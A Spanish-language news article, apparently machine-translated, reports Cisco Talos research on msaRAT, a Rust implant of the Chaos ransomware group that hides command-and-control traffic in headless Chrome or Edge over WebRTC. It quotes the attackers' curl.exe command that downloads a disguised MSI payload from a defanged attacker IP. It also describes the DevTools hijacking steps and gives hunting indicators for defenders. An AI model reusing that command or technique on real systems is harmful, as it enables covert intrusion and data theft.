Cerrar menú
  • Inicio
  • Identidad
  • Inventos
  • Futuro
  • Ciencia
  • Startups
  • English
What's Hot

Meta lanza un nuevo anuncio de optimismo sobre IA con una canción sobre la extinción humana

NanoPureUSA presenta un sistema de tratamiento de PFAS de un solo operador

Genesis Mission lanza 278 proyectos impulsados ​​por IA en EE. UU.

Facebook X (Twitter) Instagram
  • Home
  • Contáctenos
  • DMCA
  • Política de Privacidad
  • Sobre Nosotros
  • Términos y Condiciones
  • 📢 Anúnciate con Nosotros
  • Enviar publicaciones
FySelf Noticias
  • Inicio
  • Identidad
  • Inventos
  • Futuro
  • Ciencia
  • Startups
  • English
FySelf Noticias
Home»Identidad»Chaos ransomware utiliza msaRAT para enrutar el tráfico C2 a través de Chrome y Edge sin cabeza
Identidad

Chaos ransomware utiliza msaRAT para enrutar el tráfico C2 a través de Chrome y Edge sin cabeza

corp@blsindustriaytecnologia.comBy corp@blsindustriaytecnologia.comjulio 23, 2026No hay comentarios6 minutos de lectura
Share Facebook Twitter Pinterest Telegram LinkedIn Tumblr Email Copy Link
Follow Us
Google News Flipboard
Share
Facebook Twitter LinkedIn Pinterest Email Copy Link

El grupo de ransomware Chaos ejercía mando y control a través de los propios navegadores de las víctimas. Cisco Talos detalló el jueves msaRAT, el implante Rust detrás de él que fue descubierto en máquinas Windows comprometidas antes de sus capacidades de cifrado.

El implante no abre ninguna conexión de salida propia. Ese proceso se comunica con 127.0.0.1 y nada más. Inicie Chrome o Edge en modo sin cabeza y controle el navegador a través de la API de depuración propia del navegador, el protocolo Chrome DevTools.

Todos los mensajes C2 se envían desde allí a través de un canal de datos WebRTC transmitido por el servicio TURN de Twilio, por lo que lo que los defensores ven en el cable es un navegador que llama Cloudflare y Twilio. La dirección del servidor del propio atacante nunca es visible.

Chrome habla

msaRAT primero busca Chrome o Edge a través de variables de entorno y luego recurre al registro de Chrome. Si no se encuentra ningún navegador coincidente, se omite la ruta CDP.

Si lo encuentra, use –headless=new para iniciar el navegador sin mostrar una ventana, habilite CDP con –remote-debugging-port y especifique un –user-data-dir diferente.

A partir de Chrome 136, Google ya no acepta modificadores de depuración para el perfil predeterminado. Este cambio se anunció en marzo de 2025 después de que los ladrones de información denunciaran el robo de cookies. msaRAT introduce su propio directorio de perfiles, por lo que los cambios no son intrusivos. El análisis de Talos no muestra exposición a los perfiles de las víctimas.

El malware solicita un objetivo depurable de /json/list/ y se conecta a la URL de WebSocket devuelta. Cree una pestaña, desactive la política de seguridad de contenido con Page.setBypassCSP, registre cinco devoluciones de llamada a través de Runtime.addBinding y llame a Runtime.evaluate para inyectar JavaScript almacenado en texto sin cifrar en la sección .rdata del binario.

Los cuatro nombres de devolución de llamada le dieron a Talos el nombre del malware: msaOpen, msaClose, msaError y msaMessage. El quinto es dataAck.

Ese JavaScript recupera la configuración STUN y TURN del Cloudflare Worker en is-01-ast(.)ols-img-12(.)workers(.)dev utilizando encabezados Origin y Referer disfrazados de tráfico del sitio de Microsoft. Cree una conexión entre pares y publique una oferta SDP en el mismo punto final.

La respuesta es que no hay candidatos de ICE y la dirección de conexión está configurada en 0.0.0.0, por lo que no se puede formar un enlace directo de igual a igual y todo el canal pasa por el relé de Twilio en global.turn.twilio.com. Una vez que el canal de datos está activo, el trabajador abandona el camino.

El tráfico en ese canal se cifra dos veces. El navegador maneja DTLS e internamente hay un esquema basado en ChaCha-Poly1305 codificado por un intercambio ECDH que comienza con un marco de protocolo de enlace 0xFE desde el C2 inmediatamente después de la conexión.

El implante pasa el marco de comando entrante a cmd.exe /e:ON /v:OFF /d /c para su ejecución. Talos lee colas salientes y controles de flujo creados para mover de manera confiable grandes cargas, como capturas de pantalla y archivos.

Ni siquiera la mitad del transporte es nuevo. En agosto de 2025, Praetorian demostró que la infraestructura TURN de la plataforma de conferencias era capaz de transportar un canal C2 completo y, en marzo de 2026, Sansec descubrió un skimmer que utilizaba canales de datos WebRTC para mover datos de tarjetas robadas más allá de la inspección HTTP.

msaRAT coloca ambos dentro de un implante Rust vinculado al Caos que impulsa un navegador sin cabeza a través de CDP.

La entrada es la misma que antes.

msaRAT llega después de que se haya ejecutado el operador pero antes de que se ejecute el programa de cifrado. Talos no dijo cómo se obtuvo esta máquina. Los manuales documentados de este grupo son herramientas RMM para la inundación de spam, vishing, asistencia rápida y persistencia.

El implante en sí se ejecuta con un único comando de flexión.

curl.exe http://172.86.126(.)18:443/update_ms.msi -o C:\programdata\update_ms.msi

Puerto 443, HTTP simple. Las reglas de firewall escritas alrededor de números de puerto sin inspección de protocolo pasarán este puerto. MSI mantiene datos de propiedades que disfrazan las actualizaciones de Windows y, al final de la instalación, se invoca una acción personalizada para cargar la DLL integrada directamente en la memoria.

Esa DLL es msaRAT. Está escrito en Rust en el tiempo de ejecución asincrónico de Tokio y exporta una función llamada RUN para que la llame el instalador.

nota de caza

Debido a que msaRAT es un malware posterior al compromiso y no depende de las vulnerabilidades de Chrome o Edge, los defensores no tienen un parche de navegador para aplicar a la técnica en sí.

Una señal persistente es un comportamiento de proceso. Como dice Talos, «se observa que todas las comunicaciones externas se originan en procesos legítimos del navegador». Busque Chrome o Edge iniciado por un instalador, servicio u otro padre no interactivo con –headless=new y –remote-debugging-port configurado.

Luego asocie ese proceso con el puerto de depuración y el tráfico de bucle invertido al WebRTC saliente. Si la telemetría captura mensajes CDP, Runtime.addBinding y Runtime.evaluate son los pivotes. Las flotas que ejecutan automatización del navegador o CI tienen sus propios trabajos sin cabeza que orquestar.

Al 23 de julio de 2026, Talos no ha publicado hashes de archivos para msaRAT. El conjunto de indicadores públicos consta de dos artefactos de red: una IP provisional y un nombre de host de trabajador, ambos ubicados en el repositorio del IOC. Rango de detección de Talos:

ClamAV: Win.Downloader.ChaosRaas-10060321-0 Snort 2: 1:66839, 1:66840, 1:66841 Snort 3: 1:66839, 1:301587

Estos indicadores son útiles, pero tienen un alcance limitado. works.dev es el dominio de implementación compartido de Cloudflare, publicado en todas las cuentas de Workers y fue utilizado por atacantes el año pasado para organizar cargas útiles y túnel C2.

Twilio ejecuta los servicios canónicos STUN y TURN de los que dependen las aplicaciones WebRTC reales. El bloqueo de cualquiera de ellos a nivel de organización interrumpirá el tráfico laboral de todos los que los utilicen. Talos interpreta esto como una razón probable por la que se eligieron los trabajadores de Cloudflare para la señalización.

Trate esto como una operación observada en lugar de una campaña mesurada. El informe no identifica a las víctimas, cuántas organizaciones recibieron msaRAT, cuándo se utilizó el malware ni cómo se obtuvieron las credenciales de Cloudflare Worker y Twilio TURN.

La distribución no tiene nada de especial, incluidas descargas curl, actualizaciones falsas de Windows y archivos DLL cargados desde MSI. Lo que cambia es dónde reside C2 después de eso, y ambos indicadores publicados por Talos podrían ser reemplazados mañana. Los navegadores sin cabeza generados por los instaladores son más difíciles de navegar debido a su tecnología.

msaRAT comprueba dos navegadores y uno de ellos debe estar presente y permitido. Para las flotas de Windows, este no es un requisito estricto.


Source link

#BlockchainIdentidad #Ciberseguridad #ÉticaDigital #IdentidadDigital #Privacidad #ProtecciónDeDatos
Follow on Google News Follow on Flipboard
Share. Facebook Twitter Pinterest LinkedIn Tumblr Email Copy Link
Previous ArticleChina y JadeProx de Nexus utilizan el nuevo cargador TriBack en ataques contra organizaciones gubernamentales y de atención médica
Next Article La vulnerabilidad de Claude Cowork podría permitir que el agente de IA escape de la VM y acceda a archivos de Mac
corp@blsindustriaytecnologia.com
  • Website

Related Posts

La vulnerabilidad de Claude Cowork podría permitir que el agente de IA escape de la VM y acceda a archivos de Mac

julio 23, 2026

China y JadeProx de Nexus utilizan el nuevo cargador TriBack en ataques contra organizaciones gubernamentales y de atención médica

julio 23, 2026

Cómo ocurre el fraude de identificación sintética contra las identificaciones de máquinas

julio 23, 2026
Add A Comment
Leave A Reply Cancel Reply

el último

Meta lanza un nuevo anuncio de optimismo sobre IA con una canción sobre la extinción humana

NanoPureUSA presenta un sistema de tratamiento de PFAS de un solo operador

Genesis Mission lanza 278 proyectos impulsados ​​por IA en EE. UU.

La vulnerabilidad de Claude Cowork podría permitir que el agente de IA escape de la VM y acceda a archivos de Mac

Publicaciones de tendencia

Suscríbete a las noticias

Suscríbete a nuestro boletín informativo y no te pierdas nuestras últimas noticias.

Suscríbete a mi boletín informativo para recibir nuevas publicaciones y consejos. ¡Manténgase al día!

Noticias Fyself es un medio digital dedicado a brindar información actualizada, precisa y relevante sobre los temas que están moldeando el futuro: economía, tecnología, startups, invenciones, sostenibilidad y fintech.

el último

TwinH Presenta una Tecnología Revolucionaria para Cocinas Inteligentes

¡Conoce a tu gemelo digital! La IA de vanguardia de Europa que está personalizando la medicina

TwinH: El cambio de juego de la IA para servicios legales más rápidos y accesibles

Facebook X (Twitter) Instagram Pinterest YouTube
  • Home
  • Contáctenos
  • DMCA
  • Política de Privacidad
  • Sobre Nosotros
  • Términos y Condiciones
  • 📢 Anúnciate con Nosotros
  • Enviar publicaciones
© 2026 noticias.fyself. Designed by noticias.fyself.

Escribe arriba y pulsa Enter para buscar. Pulsa Esc para cancelar.